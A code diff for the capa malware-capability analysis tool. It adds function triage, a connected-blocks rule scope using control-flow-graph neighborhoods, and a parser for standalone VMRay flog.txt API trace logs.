diff --git a/CHANGELOG.md b/CHANGELOG.md index 3169082671..2a5da92c2e 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,7 +5,12 @@ ### New Features - ghidra: support PyGhidra @mike-hunhoff #2788 +- vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452 +- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835 +- static: add function triage stage (skip/deprioritize/analyze logging) before function matching; library skip reporting unchanged +- static rules: add `connected blocks` scope/subscope with fixed depth=2 CFG neighborhoods and Vivisect CFG-edge support +- scripts: add `scripts/demo_connected_blocks_and_triage.py` to show triage counts and connected-block rule syntax ### Breaking Changes diff --git a/README.md b/README.md index 8a0fc9e9a3..890e4c6ab5 100644 --- a/README.md +++ b/README.md @@ -89,6 +89,22 @@ To use capa as a library or integrate with another tool, see [doc/installation.m **Documentation:** [Usage and tips](doc/usage.md) · [Installation](doc/installation.md) · [Limitations](doc/limitations.md) · [FAQ](doc/faq.md) +## static pipeline triage and connected blocks + +Recent static pipeline updates add: + +- **function triage** before full function matching: functions may be conservatively marked as skip/deprioritize using lightweight signals (library/flirt state, function size, API presence when available, thunk/runtime naming patterns). +- **connected blocks** static subscope syntax: + +```yaml +- connected blocks: + - and: + - api: kernel32.CreateFileA + - api: kernel32.WriteFile +``` + +Connected-block matching currently uses fixed CFG neighborhood depth `2` and is available when using a backend with CFG edge support (Vivisect). Other static backends return no CFG edges for this scope. 
@dataclass
class CodeCapabilities:
    """capabilities found within a single function, grouped by the scope at which they matched."""

    function_matches: MatchResults
    connected_block_matches: MatchResults
    basic_block_matches: MatchResults
    instruction_matches: MatchResults
    feature_count: int


def _build_connected_block_adjacency(
    extractor: StaticFeatureExtractor, fh: FunctionHandle, bbs: tuple[BBHandle, ...]
) -> dict:
    """
    return an undirected adjacency map (basic block address -> neighbor addresses)
    for the function's CFG, keeping only edges between blocks of this function.

    the map is cached on the function handle so repeated calls are cheap.
    """
    cached = fh.ctx.get("connected_blocks_adjacency")
    if cached is not None:
        return cached

    neighbors = collections.defaultdict(set)
    block_addresses = {bb.address for bb in bbs}
    for bb in bbs:
        # indexing the defaultdict ensures isolated blocks still get an (empty) entry.
        neighbors[bb.address]
        for successor in extractor.get_cfg_edges(fh, bb):
            if successor.address not in block_addresses:
                # edge leaves the function (e.g. tail call); ignore it.
                continue
            neighbors[bb.address].add(successor.address)
            neighbors[successor.address].add(bb.address)

    fh.ctx["connected_blocks_adjacency"] = neighbors
    return neighbors


def _collect_connected_neighborhood(adjacency: dict, seed, depth: int = 2) -> set:
    """
    collect all basic block addresses within `depth` hops of `seed` over the
    undirected adjacency map (the seed itself is always included).
    """
    reached = {seed}
    frontier = {seed}
    for _ in range(depth):
        next_frontier = set()
        for node in frontier:
            next_frontier.update(adjacency.get(node, ()))
        next_frontier -= reached
        if not next_frontier:
            break
        reached |= next_frontier
        frontier = next_frontier
    return reached
insn_matches: MatchResults = collections.defaultdict(list) - for bb in extractor.get_basic_blocks(fh): - basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) - for feature, vas in basic_block_capabilities.features.items(): - function_features[feature].update(vas) - - for rule_name, res in basic_block_capabilities.basic_block_matches.items(): - bb_matches[rule_name].extend(res) - - for rule_name, res in basic_block_capabilities.instruction_matches.items(): - insn_matches[rule_name].extend(res) + has_connected_block_rules = bool(ruleset.connected_block_rules) + if has_connected_block_rules: + bbs = tuple(extractor.get_basic_blocks(fh)) + bb_features_by_address: dict = {} + for bb in bbs: + basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) + bb_features_by_address[bb.address] = basic_block_capabilities.features + for feature, vas in basic_block_capabilities.features.items(): + function_features[feature].update(vas) + + for rule_name, res in basic_block_capabilities.basic_block_matches.items(): + bb_matches[rule_name].extend(res) + + for rule_name, res in basic_block_capabilities.instruction_matches.items(): + insn_matches[rule_name].extend(res) + + adjacency = _build_connected_block_adjacency(extractor, fh, bbs) + for seed in bbs: + neighborhood = _collect_connected_neighborhood(adjacency, seed.address, depth=2) + neighborhood_features: FeatureSet = collections.defaultdict(set) + for bb_address in neighborhood: + for feature, vas in bb_features_by_address.get(bb_address, {}).items(): + neighborhood_features[feature].update(vas) + + _, matches = ruleset.match(Scope.CONNECTED_BLOCKS, neighborhood_features, seed.address) + for rule_name, res in matches.items(): + connected_block_matches[rule_name].extend(res) + rule = ruleset[rule_name] + for va, _ in res: + capa.engine.index_rule_matches(function_features, rule, [va]) + else: + for bb in extractor.get_basic_blocks(fh): + basic_block_capabilities = 
find_basic_block_capabilities(ruleset, extractor, fh, bb) + for feature, vas in basic_block_capabilities.features.items(): + function_features[feature].update(vas) + + for rule_name, res in basic_block_capabilities.basic_block_matches.items(): + bb_matches[rule_name].extend(res) + + for rule_name, res in basic_block_capabilities.instruction_matches.items(): + insn_matches[rule_name].extend(res) for feature, va in itertools.chain(extractor.extract_function_features(fh), extractor.extract_global_features()): function_features[feature].add(va) _, function_matches = ruleset.match(Scope.FUNCTION, function_features, fh.address) - return CodeCapabilities(function_matches, bb_matches, insn_matches, len(function_features)) + return CodeCapabilities(function_matches, connected_block_matches, bb_matches, insn_matches, len(function_features)) def find_static_capabilities( ruleset: RuleSet, extractor: StaticFeatureExtractor, disable_progress=None ) -> Capabilities: all_function_matches: MatchResults = collections.defaultdict(list) + all_connected_block_matches: MatchResults = collections.defaultdict(list) all_bb_matches: MatchResults = collections.defaultdict(list) all_insn_matches: MatchResults = collections.defaultdict(list) @@ -163,6 +235,7 @@ def find_static_capabilities( functions: list[FunctionHandle] = list(extractor.get_functions()) n_funcs: int = len(functions) n_libs: int = 0 + triage_counts: collections.Counter = collections.Counter() percentage: float = 0 with capa.helpers.CapaProgressBar( @@ -171,7 +244,27 @@ def find_static_capabilities( task = pbar.add_task( "matching", total=n_funcs, unit="functions", postfix=f"skipped {n_libs} library functions, {percentage}%" ) + triage_results: dict = {} + prioritized_functions: list[FunctionHandle] = [] + deprioritized_functions: list[FunctionHandle] = [] + skipped_functions: list[FunctionHandle] = [] for f in functions: + if extractor.is_library_function(f.address): + triage_counts[TriageDecision.SKIP.value] += 1 + 
classify_library_function(f) + prioritized_functions.append(f) + continue + triage = classify_function(extractor, f) + triage_results[f.address] = triage + triage_counts[triage.decision.value] += 1 + if triage.decision == TriageDecision.SKIP: + skipped_functions.append(f) + elif triage.decision == TriageDecision.DEPRIORITIZE: + deprioritized_functions.append(f) + else: + prioritized_functions.append(f) + + for f in itertools.chain(prioritized_functions, deprioritized_functions, skipped_functions): t0 = time.time() if extractor.is_library_function(f.address): function_name = extractor.get_function_name(f.address) @@ -185,6 +278,12 @@ def find_static_capabilities( pbar.advance(task) continue + triage = triage_results[f.address] + if triage.decision == TriageDecision.SKIP: + logger.debug("skipping triaged function %s (%s)", f.address, triage.reason) + pbar.advance(task) + continue + code_capabilities = find_code_capabilities(ruleset, extractor, f) feature_counts.functions += ( rdoc.FunctionFeatureCount( @@ -196,6 +295,7 @@ def find_static_capabilities( match_count = 0 for name, matches_ in itertools.chain( code_capabilities.function_matches.items(), + code_capabilities.connected_block_matches.items(), code_capabilities.basic_block_matches.items(), code_capabilities.instruction_matches.items(), ): @@ -212,6 +312,8 @@ def find_static_capabilities( for rule_name, res in code_capabilities.function_matches.items(): all_function_matches[rule_name].extend(res) + for rule_name, res in code_capabilities.connected_block_matches.items(): + all_connected_block_matches[rule_name].extend(res) for rule_name, res in code_capabilities.basic_block_matches.items(): all_bb_matches[rule_name].extend(res) for rule_name, res in code_capabilities.instruction_matches.items(): @@ -219,11 +321,22 @@ def find_static_capabilities( pbar.advance(task) + logger.debug( + "function triage summary: analyze=%d deprioritize=%d skip=%d (library=%d)", + triage_counts[TriageDecision.ANALYZE.value], + 
triage_counts[TriageDecision.DEPRIORITIZE.value], + triage_counts[TriageDecision.SKIP.value] - n_libs, + n_libs, + ) + # collection of features that captures the rule matches within function, BB, and instruction scopes. # mapping from feature (matched rule) to set of addresses at which it matched. function_and_lower_features: FeatureSet = collections.defaultdict(set) for rule_name, results in itertools.chain( - all_function_matches.items(), all_bb_matches.items(), all_insn_matches.items() + all_function_matches.items(), + all_connected_block_matches.items(), + all_bb_matches.items(), + all_insn_matches.items(), ): locations = {p[0] for p in results} rule = ruleset[rule_name] @@ -239,6 +352,7 @@ def find_static_capabilities( # and we can merge the dictionaries naively. all_insn_matches.items(), all_bb_matches.items(), + all_connected_block_matches.items(), all_function_matches.items(), all_file_capabilities.matches.items(), ) diff --git a/capa/capabilities/triage.py b/capa/capabilities/triage.py new file mode 100644 index 0000000000..b016b2d894 --- /dev/null +++ b/capa/capabilities/triage.py @@ -0,0 +1,202 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
import logging
from enum import Enum
from dataclasses import dataclass

import capa.features.insn
from capa.features.extractors.base_extractor import FunctionHandle, StaticFeatureExtractor

logger = logging.getLogger(__name__)


# human-readable reasons recorded on triage decisions; used for debug logging only.
REASON_DEFAULT = "analyze"
REASON_LIBRARY = "library/flirt function"
REASON_CRT_NAME = "crt/runtime function name pattern"
REASON_TINY_NO_API = "tiny function without API evidence"
REASON_THUNK = "thunk-like function"
REASON_RUNTIME_SECTION = "runtime section pattern"
REASON_LARGE_COMPLEXITY = "large function complexity"

# name prefixes of compiler/CRT support routines that are safe to skip.
CRT_NAME_PREFIXES = (
    "__security_",
    "__scrt_",
    "__acrt_",
    "__vcrt_",
    "__chkstk",
    "_chkstk",
    "__gshandler",
    "__cxx",
    "_cxx",
    "__initterm",
    "_initterm",
    "__crt",
    "__imp_",
    "_imp__",
)

# disassembler-style prefixes (jump thunks, empty stubs) treated like runtime names;
# hoisted so the tuple concatenation happens once, not per call.
_RUNTIME_NAME_PREFIXES = CRT_NAME_PREFIXES + ("j_", "nullsub_")

# sections that typically hold compiler/loader plumbing rather than program logic.
RUNTIME_SECTION_NAMES = {
    ".init",
    ".fini",
    ".init_array",
    ".fini_array",
    ".ctors",
    ".dtors",
    ".plt",
    ".plt.got",
    ".plt.sec",
}


class TriageDecision(str, Enum):
    ANALYZE = "analyze"
    SKIP = "skip"
    DEPRIORITIZE = "deprioritize"


@dataclass(frozen=True)
class TriageResult:
    # decision for the triaged function; reason is a human-readable explanation for logging.
    decision: TriageDecision
    reason: str = REASON_DEFAULT


def _looks_like_runtime_name(name: str) -> bool:
    """return True when the (case-insensitive) name matches a CRT/runtime/thunk naming pattern."""
    return name.lower().startswith(_RUNTIME_NAME_PREFIXES)


def _get_function_name(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> str:
    """best-effort function name; empty string when the extractor has no name for the address."""
    try:
        return extractor.get_function_name(fh.address)
    except KeyError:
        return ""


def _get_section_name(fh: FunctionHandle) -> str:
    """
    best-effort name of the section/segment containing the function.

    prefers an explicit `section_name` attribute on the backend function object,
    falling back to scanning Vivisect workspace segments.
    returns "" when no section can be determined.
    """
    inner = fh.inner
    if inner is None:
        return ""
    section = getattr(inner, "section_name", "")
    # fix: require a non-empty string before returning; the getattr default ("")
    # is itself a str, so the original `isinstance(section, str)` check always
    # returned early and made the Vivisect fallback below unreachable.
    if isinstance(section, str) and section:
        return section
    vw = getattr(inner, "vw", None)
    va = getattr(inner, "va", None)
    if vw is None or va is None:
        return ""
    # NOTE(review): assumes Vivisect getSegments() yields (va, size, name, filename) — confirm.
    for seg_va, seg_size, seg_name, _ in vw.getSegments():
        if seg_va <= va < seg_va + seg_size:
            return seg_name
    return ""


def _collect_size_and_signals(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> tuple[int, int, bool, bool]:
    """
    cheaply scan the function's basic blocks and return
    (basic block count, instruction count, has call-like mnemonic, looks like a thunk).

    API presence here is a mnemonic heuristic ("call*"); callers should confirm
    via _has_api_feature_evidence when a skip decision hinges on it.
    """
    bb_count = 0
    insn_count = 0
    has_api = False
    is_thunk_candidate = False

    for bbh in extractor.get_basic_blocks(fh):
        bb_count += 1
        instructions = list(extractor.get_instructions(fh, bbh))
        insn_count += len(instructions)

        if bb_count == 1 and 0 < len(instructions) <= 3:
            # a thunk is typically a single tiny block ending in jmp (or a trivial ret stub).
            last = instructions[-1].inner
            mnem = getattr(last, "mnem", "")
            if mnem in ("jmp", "ret"):
                is_thunk_candidate = True

        # once API presence is established there is no need to rescan instructions;
        # (the original's trailing `if has_api and bb_count > 1: continue` was a
        # no-op — it was the last statement of the loop body — and is removed.)
        if not has_api:
            for ih in instructions:
                mnem = getattr(ih.inner, "mnem", "")
                if isinstance(mnem, str) and mnem.lower().startswith("call"):
                    has_api = True
                    break

    is_thunk = bb_count == 1 and is_thunk_candidate
    return bb_count, insn_count, has_api, is_thunk


def _has_api_feature_evidence(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> bool:
    """
    confirm API evidence using extracted instruction features.
    this avoids false negatives from mnemonic-only call heuristics.
    """
    for bbh in extractor.get_basic_blocks(fh):
        for ih in extractor.get_instructions(fh, bbh):
            for feature, _ in extractor.extract_insn_features(fh, bbh, ih):
                if isinstance(feature, capa.features.insn.API):
                    return True
    return False


def classify_function(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> TriageResult:
    """
    conservatively triage a function prior to full feature matching.

    returns SKIP for compiler/runtime plumbing (CRT names, thunks, runtime sections,
    tiny no-API helpers), DEPRIORITIZE for very large functions, ANALYZE otherwise.
    ambiguous signals always fall through to ANALYZE.
    """
    if fh.inner is None:
        result = TriageResult(TriageDecision.ANALYZE, REASON_DEFAULT)
        logger.debug(
            "function triage: address=%s decision=%s reason=%s (no function context)",
            fh.address,
            result.decision.value,
            result.reason,
        )
        return result

    name = _get_function_name(extractor, fh)
    section_name = _get_section_name(fh).lower()
    bb_count, insn_count, has_api, is_thunk = _collect_size_and_signals(extractor, fh)

    # before skipping a candidate based on the cheap mnemonic scan, double-check
    # API usage via extracted features to avoid skipping real capability code.
    is_tiny_helper = bool(name) and bb_count <= 1 and insn_count <= 4
    if not has_api and (is_thunk or section_name in RUNTIME_SECTION_NAMES or is_tiny_helper):
        has_api = _has_api_feature_evidence(extractor, fh)

    if name and _looks_like_runtime_name(name):
        result = TriageResult(TriageDecision.SKIP, REASON_CRT_NAME)
    elif is_thunk and not has_api:
        result = TriageResult(TriageDecision.SKIP, REASON_THUNK)
    elif section_name in RUNTIME_SECTION_NAMES and not has_api and insn_count <= 8:
        result = TriageResult(TriageDecision.SKIP, REASON_RUNTIME_SECTION)
    elif is_tiny_helper and not has_api:
        # conservative skip: only very small/no-API helpers.
        result = TriageResult(TriageDecision.SKIP, REASON_TINY_NO_API)
    elif bb_count >= 512 or insn_count >= 4096:
        result = TriageResult(TriageDecision.DEPRIORITIZE, REASON_LARGE_COMPLEXITY)
    else:
        result = TriageResult(TriageDecision.ANALYZE, REASON_DEFAULT)

    logger.debug(
        "function triage: address=%s decision=%s reason=%s bb=%d insn=%d has_api=%s thunk=%s section=%s name=%s",
        fh.address,
        result.decision.value,
        result.reason,
        bb_count,
        insn_count,
        has_api,
        is_thunk,
        section_name,
        name,
    )
    return result


def classify_library_function(fh: FunctionHandle) -> TriageResult:
    """triage result for a function already identified as a library (FLIRT) function: always SKIP."""
    result = TriageResult(TriageDecision.SKIP, REASON_LIBRARY)
    logger.debug(
        "function triage: address=%s decision=%s reason=%s",
        fh.address,
        result.decision.value,
        result.reason,
    )
    return result
+ """ + yield from () + @abc.abstractmethod def get_instructions(self, f: FunctionHandle, bb: BBHandle) -> Iterator[InsnHandle]: """ diff --git a/capa/features/extractors/viv/extractor.py b/capa/features/extractors/viv/extractor.py index 99d60e4a80..3882b69e89 100644 --- a/capa/features/extractors/viv/extractor.py +++ b/capa/features/extractors/viv/extractor.py @@ -16,6 +16,7 @@ from typing import Any, Iterator from pathlib import Path +import envi import viv_utils import viv_utils.flirt @@ -84,6 +85,27 @@ def get_instructions(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[InsnHa for insn in bb.instructions: yield InsnHandle(address=AbsoluteVirtualAddress(insn.va), inner=insn) + def get_cfg_edges(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[BBHandle]: + f: viv_utils.Function = fh.inner + bb: viv_utils.BasicBlock = bbh.inner + + bb_by_va = {b.va: b for b in f.basic_blocks} + if len(bb.instructions) == 0: + return + + last_insn = bb.instructions[-1] + for bva, bflags in last_insn.getBranches(): + if bva is None: + continue + + if ( + bflags & envi.BR_COND + or bflags & envi.BR_FALL + or bflags & envi.BR_TABLE + or last_insn.mnem == "jmp" + ) and bva in bb_by_va: + yield BBHandle(address=AbsoluteVirtualAddress(bva), inner=bb_by_va[bva]) + def extract_insn_features( self, fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle ) -> Iterator[tuple[Feature, Address]]: diff --git a/capa/features/extractors/vmray/__init__.py b/capa/features/extractors/vmray/__init__.py index 0eaf0d4c22..a27b9ae1b6 100644 --- a/capa/features/extractors/vmray/__init__.py +++ b/capa/features/extractors/vmray/__init__.py @@ -20,13 +20,23 @@ from dataclasses import dataclass from capa.exceptions import UnsupportedFormatError -from capa.features.extractors.vmray.models import File, Flog, SummaryV2, StaticData, FunctionCall, xml_to_dict +from capa.features.extractors.vmray.models import ( + AnalysisMetadata, + File, + FileHashes, + Flog, + FunctionCall, + StaticData, + SummaryV2, + 
    @classmethod
    def from_flog_txt(cls, flog_txt_path: Path) -> "VMRayAnalysis":
        """
        Build VMRayAnalysis from a standalone flog.txt file (no ZIP).
        Used when only the free "Download Function Log" from VMRay is available.
        No submission file or static data; only API trace is available.
        """
        # bypass __init__: the normal constructor requires a ZIP archive.
        self = cls.__new__(cls)
        self.zipfile = None
        self.flog = flog_txt.parse_flog_txt_path(flog_txt_path)
        if self.flog.analysis.log_version not in SUPPORTED_FLOG_VERSIONS:
            raise UnsupportedFormatError(
                "VMRay feature extractor does not support flog version %s" % self.flog.analysis.log_version
            )
        # minimal synthetic summary: flog.txt carries no summary_v2.json metadata.
        self.sv2 = SummaryV2(
            analysis_metadata=AnalysisMetadata(
                sample_type="unknown",
                submission_filename=flog_txt_path.name,
            ),
        )
        self.submission_type = "unknown"
        self.submission_name = flog_txt_path.name
        # placeholder hashes: the submitted sample itself is not available.
        self.submission_meta = File(
            hash_values=FileHashes(md5="0" * 32, sha1="0" * 40, sha256="0" * 64),
            is_sample=True,
            ref_static_data=None,
        )
        self.submission_sha256 = None
        self.submission_static = None
        self.submission_bytes = b""
        self.submission_base_address = None
        # no static data: exports/imports/sections stay empty.
        self.exports = {}
        self.imports = {}
        self.sections = {}
        self.monitor_processes = {}
        self.monitor_threads = {}
        # NOTE(review): assumes `defaultdict` is imported at module level — confirm.
        self.monitor_threads_by_monitor_process = defaultdict(list)
        self.monitor_process_calls = defaultdict(lambda: defaultdict(list))
        # reuse the same derivations as the ZIP-based constructor.
        self._compute_monitor_processes()
        self._compute_monitor_threads()
        self._compute_monitor_process_calls()
        return self
    @classmethod
    def from_flog_txt(cls, flog_txt_path: Path):
        """Build extractor from a standalone VMRay flog.txt (no ZIP). See #2452."""
        # delegate parsing/analysis construction to VMRayAnalysis.from_flog_txt.
        return cls(VMRayAnalysis.from_flog_txt(flog_txt_path))
import re
from pathlib import Path
from typing import Any, Optional

from capa.exceptions import UnsupportedFormatError
from capa.features.extractors.vmray.models import (
    Analysis,
    Flog,
    FunctionCall,
    MonitorProcess,
    MonitorThread,
    Param,
    Params,
)

FLOG_TXT_VERSION_HEADER = "# Flog Txt Version 1"

# Matches name=value argument pairs inside an API call's parentheses.
# value may be: "quoted string" (including escaped chars), 0xHEX, decimal, or other token.
_PARAM_RE = re.compile(r'(\w+)=((?:"(?:[^"\\]|\\.)*")|(?:0x[0-9a-fA-F]+)|(?:\d+)|(?:[^,\s]+))')

# Exact numeric hex token; used to distinguish numbers from symbolic constants (NULL, TRUE, ...).
# Precompiled here because _parse_args runs once per API call argument list.
_HEX_RE = re.compile(r"^0x[0-9a-fA-F]+$")

# One API trace line: [timestamp] api_name (args) [returned rv].
# Precompiled here because _parse_event runs once per trace line.
_EVENT_RE = re.compile(r"\[\s*(\d+)\.(\d+)\]\s+(\S+)\s*\((.*)\)\s*(?:returned\s+(0x[0-9a-fA-F]+|\d+))?")


def _parse_hex_or_decimal(s: str) -> int:
    """
    Parse "0x..."-hex or decimal text into an int.

    Returns 0 for empty or non-numeric input: this is a best-effort parser, and a
    single malformed property value (e.g. a symbolic token in an os_pid field)
    must not abort parsing of the whole log with a ValueError.
    """
    s = s.strip().strip('"')
    if not s:
        return 0
    try:
        if s.lower().startswith("0x"):
            return int(s, 16)
        return int(s, 10)
    except ValueError:
        # non-numeric token; fall back to 0 rather than failing the entire parse.
        return 0


def _parse_properties(block: str) -> dict[str, Any]:
    """Parse key = value lines from a Process/Thread/Region block."""
    result: dict[str, Any] = {}
    for line in block.splitlines():
        line = line.strip()
        if not line or " = " not in line:
            continue
        key, _, value = line.partition(" = ")
        key = key.strip()
        value = value.strip()
        if key in ("os_pid", "os_parent_pid", "parent_id", "process_id", "thread_id", "os_tid", "id"):
            result[key] = _parse_hex_or_decimal(value)
        elif key in ("filename", "image_name", "cmd_line", "monitor_reason"):
            result[key] = value.strip('"').replace("\\\\", "\\").strip()
        else:
            result[key] = value
    return result


def _parse_args(args_str: str) -> Optional[Params]:
    """
    Parse an API call's argument string into a Params object.

    Handles: name="quoted string", name=0xHEX, name=DECIMAL.
    String values are modelled as void_ptr + str deref to match the XML extractor convention
    so that String features are correctly yielded by the call feature extractor.
    Numeric values use type unsigned_32bit so that Number features are yielded.
    Symbolic constants (e.g. NULL, TRUE) are skipped; their numeric values are unknown without
    header definitions.

    Returns None if no parseable arguments are present.
    """
    if not args_str.strip():
        return None
    params: list[Param] = []
    for m in _PARAM_RE.finditer(args_str):
        name = m.group(1)
        raw = m.group(2)
        if raw.startswith('"'):
            # String value — model as void_ptr with str deref (matches XML extractor convention)
            str_val = raw[1:-1]
            params.append(
                Param.model_validate({"name": name, "type": "void_ptr", "deref": {"type": "str", "value": str_val}})
            )
        elif _HEX_RE.match(raw) or raw.isdigit():
            # Numeric value — model as integer so Number features are yielded
            params.append(Param.model_validate({"name": name, "type": "unsigned_32bit", "value": raw}))
        # else: symbolic constant (NULL, INVALID_HANDLE_VALUE, etc.) — skip; value not recoverable
    if not params:
        return None
    return Params.model_validate({"param": params})


def _parse_event(line: str) -> Optional[tuple[str, str, Optional[int]]]:
    """
    Parse one API trace line. Returns (api_name, args_str, return_value) or None.

    Examples:
        [0072.750] GetCurrentProcess () returned 0xffffffffffffffff
        [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc
        [0083.567] CoTaskMemFree (pv=0x746aa0)
    """
    line = line.strip()
    if not line.startswith("["):
        return None
    match = _EVENT_RE.match(line)
    if not match:
        return None
    _major, _minor, api_name, args, rv = match.groups()
    args = args.strip() if args else ""
    return_value: Optional[int] = None
    if rv:
        return_value = _parse_hex_or_decimal(rv)
    return (api_name, args, return_value)


def _parse_thread_block(
    block: str, thread_props: dict[str, Any]
) -> Optional[tuple[MonitorThread, list[tuple[str, str, Optional[int]]]]]:
    """Parse a Thread: block; return MonitorThread and collect events (caller adds them)."""
    lines = block.splitlines()
    events: list[tuple[str, str, Optional[int]]] = []
    for line in lines:
        if line.strip().startswith("["):
            ev = _parse_event(line)
            if ev:
                events.append(ev)
    thread_id = thread_props.get("thread_id") or thread_props.get("id")
    os_tid = thread_props.get("os_tid", 0)
    process_id = thread_props.get("process_id", 0)
    if thread_id is None:
        return None
    # We return the MonitorThread; events are converted to FunctionCalls by the caller
    return MonitorThread(
        ts=0,
        thread_id=int(thread_id),
        process_id=int(process_id),
        os_tid=int(os_tid) if os_tid else 0,
    ), events


def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[MonitorThread], list[FunctionCall]]]:
    """
    Parse a Process: block. Returns (MonitorProcess, list of MonitorThread, list of FunctionCall) or None.
    """
    # Split by Thread: on its own line (allow optional whitespace)
    parts = re.split(r"\n\s*Thread:\s*\n", block)
    if len(parts) < 2:
        return None  # no Thread: block found
    header_and_regions = parts[0]
    thread_blocks = [p.strip() for p in parts[1:] if p.strip()]

    # First part: Process properties then Region: blocks (use regex for robustness)
    process_props = _parse_properties(re.split(r"\n\s*Region:\s*\n", header_and_regions)[0])
    process_id = process_props.get("id") or process_props.get("process_id")
    if process_id is None:
        return None
    monitor_process = MonitorProcess(
        ts=0,
        process_id=int(process_id),
        image_name=process_props.get("image_name", "").strip('"') or "unknown",
        filename=process_props.get("filename", "").strip('"') or "",
        os_pid=process_props.get("os_pid", 0) or 0,
        monitor_reason=process_props.get("monitor_reason", "analysis_target").strip('"'),
        parent_id=int(process_props.get("parent_id", 0) or 0),
        os_parent_pid=int(process_props.get("os_parent_pid", 0) or 0),
        cmd_line=process_props.get("cmd_line", "").strip('"') or "",
    )

    threads: list[MonitorThread] = []
    function_calls: list[FunctionCall] = []
    fncall_id = 0
    for thread_block in thread_blocks:
        thread_props = _parse_properties(thread_block)
        thread_props["process_id"] = process_id
        parsed = _parse_thread_block(thread_block, thread_props)
        if parsed is None:
            continue
        mon_thread, events = parsed
        threads.append(mon_thread)
        for api_name, args_str, rv in events:
            fncall_id += 1
            # Strip sys_ prefix for Linux kernel calls (match XML behavior)
            if api_name.startswith("sys_"):
                api_name = api_name[4:]
            # use model_validate because FunctionCall's "in" alias clashes with a Python keyword;
            # passing params_in= via __init__ is silently dropped by Pydantic
            function_calls.append(
                FunctionCall.model_validate(
                    {
                        "fncall_id": fncall_id,
                        "process_id": mon_thread.process_id,
                        "thread_id": mon_thread.thread_id,
                        "name": api_name,
                        "in": _parse_args(args_str),
                        "out": None,
                    }
                )
            )

    return (monitor_process, threads, function_calls)


def parse_flog_txt(content: str) -> Flog:
    """
    Parse flog.txt content into the same Flog (Analysis) model used by the XML path.
    """
    # Skip BOM if present; normalize line endings so splits on "Process:\n" / "Thread:\n" work
    if content.startswith("\ufeff"):
        content = content[1:]
    content = content.replace("\r\n", "\n").replace("\r", "\n")
    lines = content.splitlines()
    # Find end of header (first non-# line)
    header_end: Optional[int] = None
    for i, line in enumerate(lines):
        if line.strip() and not line.strip().startswith("#"):
            header_end = i
            break
    if header_end is None:
        header_end = len(lines)
    header = "\n".join(lines[:header_end])
    if FLOG_TXT_VERSION_HEADER not in header:
        raise UnsupportedFormatError(
            "File does not appear to be a VMRay flog.txt (missing '%s')" % FLOG_TXT_VERSION_HEADER
        )
    body = "\n".join(lines[header_end:]).strip()

    # Split by "Process:" on its own line (allow optional whitespace)
    process_blocks = re.split(r"\n\s*Process:\s*\n", body)
    process_blocks = [b.strip() for b in process_blocks if b.strip()]
    # If body started with "Process:\n", first element is the only block and starts with "Process:\n"
    if not process_blocks and body.strip():
        # No split happened (e.g. body is "Process:\nid=..."), treat whole body as one process block
        process_blocks = [body.strip()]
    monitor_processes: list[MonitorProcess] = []
    monitor_threads: list[MonitorThread] = []
    function_calls: list[FunctionCall] = []

    for block in process_blocks:
        # First block may start with "Process:\n" when body began with that line
        if block.lstrip().startswith("Process:"):
            block = block.split("\n", 1)[-1].strip() if "\n" in block else ""
        if not block:
            continue
        result = _parse_process_block(block)
        if result is None:
            continue  # skip malformed process block
        mon_process, threads, calls = result
        monitor_processes.append(mon_process)
        monitor_threads.extend(threads)
        function_calls.extend(calls)

    # Use alias names so Pydantic accepts the lists (Analysis model uses alias= for XML compat)
    analysis = Analysis(
        log_version="1",
        analyzer_version="flog.txt",
        monitor_process=monitor_processes,
        monitor_thread=monitor_threads,
        fncall=function_calls,
    )
    return Flog(analysis=analysis)


def parse_flog_txt_path(path: Path) -> Flog:
    """Parse a flog.txt file from disk (UTF-8, undecodable bytes replaced)."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return parse_flog_txt(text)
logger.error(" Input file is not a valid VMRay analysis archive: %s", error) logger.error(" ") logger.error( - " capa only supports analyzing VMRay dynamic analysis archives containing summary_v2.json and flog.xml log files." + " capa supports analyzing VMRay dynamic analysis archives (containing summary_v2.json and flog.xml)" ) - logger.error(" Please make sure you have downloaded a dynamic analysis archive from VMRay.") + logger.error(" or a standalone VMRay function log (flog.txt, via Threat Feed -> Full Report -> Download Function Log).") + logger.error(" Please make sure you have downloaded a supported VMRay report.") logger.error("-" * 80) diff --git a/capa/ida/plugin/cache.py b/capa/ida/plugin/cache.py index d7cbfd10ac..9b019e25bd 100644 --- a/capa/ida/plugin/cache.py +++ b/capa/ida/plugin/cache.py @@ -17,6 +17,7 @@ import itertools import collections +from collections import deque from typing import Union, Optional import capa.engine @@ -160,19 +161,53 @@ def _find_basic_block_capabilities( return features, matches, insn_matches + def _build_connected_block_adjacency( + self, fh: FunctionHandle, f_node: CapaRuleGenFeatureCacheNode + ) -> dict[Address, set[Address]]: + adjacency: dict[Address, set[Address]] = collections.defaultdict(set) + bbs_by_address = {bb.address: bb for bb in f_node.children} + for bb in f_node.children: + adjacency[bb.address] + assert isinstance(bb.inner, BBHandle) + for succ in self.extractor.get_cfg_edges(fh, bb.inner): + if succ.address in bbs_by_address: + adjacency[bb.address].add(succ.address) + adjacency[succ.address].add(bb.address) + return adjacency + + @staticmethod + def _collect_connected_neighborhood( + adjacency: dict[Address, set[Address]], seed: Address, depth: int = 